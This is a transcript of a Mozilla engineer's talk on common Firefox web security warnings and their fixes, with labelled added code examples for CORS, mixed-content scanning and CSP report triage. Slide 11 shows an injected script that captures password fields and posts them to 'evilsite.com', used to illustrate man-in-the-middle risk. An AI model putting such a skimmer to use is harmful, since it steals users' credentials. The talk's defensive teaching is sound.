
luke crouch
January 25, 2017

"Top" 5 Security Errors We See From Firefox and How to Fix Them

The most common security errors & warnings that developers see in the Firefox console are not that hard to fix. This talk covers what they are, why they are dangerous, and how to fix them.


Transcript

  1. Fixing the Top 5 Web Security Errors We See from Firefox

    Luke Crouch • Privacy + Security Engineer, Mozilla • @groovecoder
  2. Me. I'm Luke Crouch. I work on Privacy & Security.

    I click thru slides really fast. Twitter: @groovecoder
  3. The "Top 5"*

    * MDN Google Analytics: pageviews in /en-US/docs/Web/Security from utm_medium=firefox-console-errors
  4. Cross-Origin Request Threats

    Attacker
    • Any malicious origin
    • Phishing & malware sites
    • Compromised CDNs
    • Untrusted first parties

    Attacks
    • Steal data from other origins
  5. HTTP Access Control (CORS)

    http://public.slidesharecdn.com/data.json
      …
      Access-Control-Allow-Origin: www.slideshare.net
      …

    http://www.slideshare.net
      <html>
        …
        <script>
          // cross-origin request from www.slideshare.net to the CDN
          var xhr = new XMLHttpRequest();
          xhr.open("GET", "http://public.slidesharecdn.com/data.json");
          xhr.send();
        </script>
        …
      </html>

    https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS
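Added example, not code from the deck: the browser-side rule that decides whether a cross-origin response can be read, and a server-side helper that builds the header from an allow-list of full origins. The function names and the allow-list values are assumptions made for this example; the slide's value `www.slideshare.net` fails because an origin must carry its scheme exactly as the browser sends it in the Origin request header.

```javascript
// Browser side: the response is readable only if Access-Control-Allow-Origin
// is "*" (and the request carried no credentials) or is byte-for-byte equal
// to the request's Origin. (Credentialed requests additionally need
// Access-Control-Allow-Credentials: true; omitted here for brevity.)
function corsReadable(requestOrigin, acaoHeader, credentialed = false) {
  if (acaoHeader === null || acaoHeader === undefined) return false;
  if (acaoHeader === "*") return !credentialed;
  return acaoHeader === requestOrigin;
}

// Server side: reflect the request's Origin only if it is on the allow-list.
// Returns the headers to add, or null for origins that get no CORS grant.
// allowlist entries are full origins, e.g. "http://www.slideshare.net".
function corsHeadersFor(requestOrigin, allowlist) {
  let parsed;
  try {
    parsed = new URL(requestOrigin);
  } catch {
    return null; // "null", scheme-less or malformed Origin values: no grant
  }
  // Require the serialized origin to match what the browser sent, so
  // "HTTP://WWW.Slideshare.net" is not silently accepted either.
  if (parsed.origin !== requestOrigin || !allowlist.includes(parsed.origin)) {
    return null;
  }
  return {
    "Access-Control-Allow-Origin": parsed.origin,
    // Tell caches the response differs per Origin, so one origin's grant
    // is never served from cache to another origin.
    "Vary": "Origin",
  };
}

// Constructed allow-list for the slide's scenario.
const ALLOWED_ORIGINS = ["http://www.slideshare.net", "https://www.slideshare.net"];
```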
  6. Form autocompletion

    <form method="post" action="/updatePII">
      <input type="text" name="ssn">
      …
    </form>

    <form method="post" action="/form">
      <input type="text" name="cc">
      …
    </form>

    https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion
  7. Disabling for sensitive information

    Disable for the entire form:
    <form method="post" action="/updatePII" autocomplete="off">
      <input type="text" name="ssn">
      …
    </form>

    Disable for one field*:
    <form method="post" action="/form">
      <input type="text" name="cc" autocomplete="off">
      …
    </form>

    https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion
  8. Caveat: login fields; browsers want to remember these

    <form method="post" action="/form">
      <input type="text" name="username" autocomplete="off">
      <input type="password" name="password" autocomplete="off">
      …
    </form>

    Has no effect; the browser still offers to remember the login.
    https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion
  9. Weak Signature Algorithms Threats

    Attacker
    • Malicious host (with redirect or MITM vector)

    Attacks
    • Collision: fraudulent certificates
      • 2008 - MD5: RapidSSL, Microsoft
      • 2015 - SHA-1: "The SHAppening"
  10. Weak Signature Algorithms

    $ openssl req -new -newkey rsa:2048 -nodes -sha1 \
        -out thecustomizewindows.com.csr \
        -keyout thecustomizewindows.com.key
    $ openssl req -in thecustomizewindows.com.csr -noout -text
    Certificate Request:
        …
        Signature Algorithm: sha1WithRSAEncryption
  11. Insecure passwords

    http://www.espn.com
    <html>
      <script>
        // Injected via HTTP MitM
        [...document.querySelectorAll("[type='password']")].forEach(pwInput => {
          pwInput.addEventListener("change", () => {
            fetch("evilsite.com", {method: "POST", body: pwInput.value});
          });
        });
      </script>
      …
      <form action="https://www.espn.com/login">
        <input type="password" />
      …
    </html>

    SEE, TOLD YOU SO!
  12. Insecure password transmission Threats

    Attacker
    • Man-in-the-middle:
      • Open WiFi
      • ISP
      • Proxies

    Attacks
    • Steal password
      + password reuse
  13. Insecure active content

    <script>, <link>, <iframe>, <object>, XMLHttpRequest, @font-face, cursor, background-image, etc.

    https://www.dailymotion.com/us
    <html>
      …
      <script src="http://mc.dailymotion.com/masscast/2/dailymotion.us/home/76127265087"></script>
      …
    </html>
  14. Insecure active content Threats

    Attacker
    • Man-in-the-middle:
      • Open WiFi
      • ISP
      • Proxies

    Attacks
    • Steal credentials
    • Steal sensitive data from DOM
    • Alter behavior of DOM
    • Install malware
  15. Insecure passive/display content

    <img>, <audio>, <video>, <object>

    https://www.booking.com/
    <html>
      …
      <img src="http://tags.w55c.net/rs?id=c332832256414794bb465731a031be55&t=homepage" />
      …
    </html>
  16. Insecure passive/display content Threats

    Attacker
    • Man-in-the-middle:
      • Open WiFi
      • ISP
      • Proxies

    Attacks
    • Break page
    • Snoop content
    • Inject misleading content
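Added example, not code from the deck, covering slides 13 through 16: a scanner that finds subresources an HTTPS page loads over plain http:// and labels each as active or passive using the two element lists from the slides. The HTML is a constructed sample modelled on the slides' markup (with example domains); `<object>` appears in both lists, so it is labelled active here, the more cautious choice.

```javascript
// Elements from slide 13 (active) and slide 15 (passive).
const ACTIVE_TAGS = new Set(["script", "link", "iframe", "object"]);
const PASSIVE_TAGS = new Set(["img", "audio", "video"]);

// Returns [{tag, url, kind}] for every tag whose src/href is a plain http:// URL,
// plus CSS url() references (background-image, cursor, @font-face), which are active.
function findMixedContent(html) {
  const findings = [];
  const tagRe = /<(\w+)\b([^>]*)>/g;
  const attrRe = /\b(src|href)\s*=\s*["']([^"']+)["']/i;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attr = attrRe.exec(m[2]);
    if (!attr) continue;
    const url = attr[2];
    if (!/^http:\/\//i.test(url)) continue; // https:// and relative URLs inherit the page's scheme
    let kind;
    if (ACTIVE_TAGS.has(tag)) kind = "active";
    else if (PASSIVE_TAGS.has(tag)) kind = "passive";
    else continue;
    findings.push({ tag, url, kind });
  }
  const cssRe = /url\(\s*["']?(http:\/\/[^"')]+)["']?\s*\)/gi;
  let c;
  while ((c = cssRe.exec(html)) !== null) {
    findings.push({ tag: "css-url", url: c[1], kind: "active" });
  }
  return findings;
}

// Constructed sample page (example domains), served from https://.
const SAMPLE_HTML = `
<html><head>
<link rel="stylesheet" href="https://cdn.example/site.css">
<style>body { background-image: url("http://static.example/bg.png"); }</style>
</head><body>
<script src="http://mc.example/masscast/2/home/123"></script>
<img src="http://tags.example/rs?id=abc&t=homepage" />
<img src="/local/logo.png">
<video src="https://media.example/intro.mp4"></video>
</body></html>`;
```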
  18. certbot + Let's Encrypt

    brew install certbot
    sudo certbot certonly --manual --preferred-challenges dns
  19. certbot + Let's Encrypt

    Please deploy a DNS TXT record under the name
    _acme-challenge.www.codesy.io with the following value:

    CxYdvM…5WvXR0

    Once this is deployed, Press ENTER to continue
  21. Content-Security-Policy-Report-Only

    Content-Security-Policy-Report-Only: default-src https:; block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/reportOnly

    Do not enforce; only report violations.
    https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only
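Added example, not code from the deck: what to do with the reports a report-uri endpoint collects while the policy above runs in Report-Only mode. The reports are constructed samples in the `csp-report` JSON shape browsers post (fields `document-uri`, `violated-directive`, `blocked-uri`, `original-policy`); the function names and example domains are assumptions.

```javascript
// Constructed sample reports, as a report-uri endpoint would receive them.
const SAMPLE_REPORTS = [
  { "csp-report": { "document-uri": "https://example.com/", "violated-directive": "default-src https:",
      "blocked-uri": "http://tags.example/rs?id=1", "original-policy": "default-src https:; block-all-mixed-content" } },
  { "csp-report": { "document-uri": "https://example.com/help", "violated-directive": "default-src https:",
      "blocked-uri": "http://tags.example/rs?id=2", "original-policy": "default-src https:; block-all-mixed-content" } },
  { "csp-report": { "document-uri": "https://example.com/", "violated-directive": "default-src https:",
      "blocked-uri": "http://mc.example/masscast/2/home/1", "original-policy": "default-src https:; block-all-mixed-content" } },
  { "csp-report": { "document-uri": "https://example.com/", "violated-directive": "default-src https:",
      "blocked-uri": "moz-extension", "original-policy": "default-src https:; block-all-mixed-content" } },
  { "csp-report": { "document-uri": "https://example.com/", "violated-directive": "default-src https:",
      "blocked-uri": "inline", "original-policy": "default-src https:; block-all-mixed-content" } },
];

// Violations caused by browser extensions are noise: no change to the page fixes them.
function isExtensionNoise(report) {
  return /^(moz|chrome|safari)-extension/.test(report["blocked-uri"] || "");
}

// Group real violations by (directive, blocked origin) so the fix list is short:
// one entry per group with a count and the set of documents affected,
// most frequent first. Non-URL blocked-uri values ("inline", "eval", "data")
// are kept verbatim as their own group.
function triageCspReports(reports) {
  const groups = new Map();
  for (const wrapper of reports) {
    const r = wrapper["csp-report"];
    if (!r || isExtensionNoise(r)) continue;
    let origin = r["blocked-uri"];
    try { origin = new URL(origin).origin; } catch { /* keep the keyword as-is */ }
    const key = `${r["violated-directive"]} | ${origin}`;
    const g = groups.get(key) ||
      { directive: r["violated-directive"], origin, count: 0, documents: new Set() };
    g.count += 1;
    g.documents.add(r["document-uri"]);
    groups.set(key, g);
  }
  return [...groups.values()].sort((a, b) => b.count - a.count);
}
```

Once the grouped list is empty for real traffic, the same policy can be moved to the enforcing Content-Security-Policy header.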
  22. Subresource Integrity (SRI)

    https://example.com
    <html>
      …
      <script src="http://examplecdn.com/framework.js"
              crossorigin="anonymous"
              integrity="sha512-oqVuAfXRKap7fdgc…"></script>
      …

    integrity="<Hash Algorithm>-<Hash Digest>"
    https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity